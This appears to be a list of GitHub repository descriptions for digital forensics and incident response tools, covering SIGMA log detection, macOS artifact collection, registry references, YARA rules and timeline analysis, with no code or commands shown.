A standalone SIGMA-based detection tool for EVTX, Auditd and Sysmon for Linux logs

A simple-to-use IR (incident response) case management tool for tracking and documenting investigations.

macOS forensic acquisition made simple

Field reference for BTL1 and Tier 1 SOC work — grep-ready cheatsheets, SPL queries, Volatility workflows, live response commands

A repo that aims to centralize a current, running list of relevant parsers/tools for known DFIR artifacts

macos-collector - Automated Collection of macOS Forensic Artifacts for DFIR

Vault of Windows Registry forensic artifacts

Casting light on shadow cloud deployments. Detect exposure of resources deployed in AWS.

A tool for fetching DFIR and other GitHub tools.

Automatically create iSCSI targets for all drives except for a boot device

like ripgrep but for browser history

A collection of PowerShell scripts for analyzing macOS Forensic Artifacts

Cryptocurrency Discovery and Triage Tool - Identify multiple cryptocurrency addresses and transactions from various wallet applications!

Outil de triage automatisé de différents types de collectes d'artefacts.

Utility for recovering ES File Explorer encrypted files (.eslock)

A deployment and testing platform for Velociraptor's client artifacts

A lightweight Tool for quick triage in live Win10/11 Systems, extracting Journal, Execution Timeline and Drive-Logs, as well as an included Process Memory String Parsing Tool.

Forensic timeline analysis tool, rewritten from Python to Go. Desktop application for analyzing large-scale forensic datasets, particularly timeline data from log2timeline (L2T) format files.

Yerel ağlarda anomaly detection, saldırı tespiti ve adli bilişim analizi yapan tek Pythontkinter tabanlı açık kaynak araç. Özelleştirilebilir imza veritabanıyla Türkiye odaklı tehditleri yakalar!

Bu repository, siber güvenlik uzmanları, SOC ekipleri ve tehdit avcıları için profesyonel YARA kurallarını bir araya getiren canlı bir bilgi havuzudur. Her kural derinlemesine malware analizi ve reverse engineering çalışmaları sonucunda geliştirilmiştir.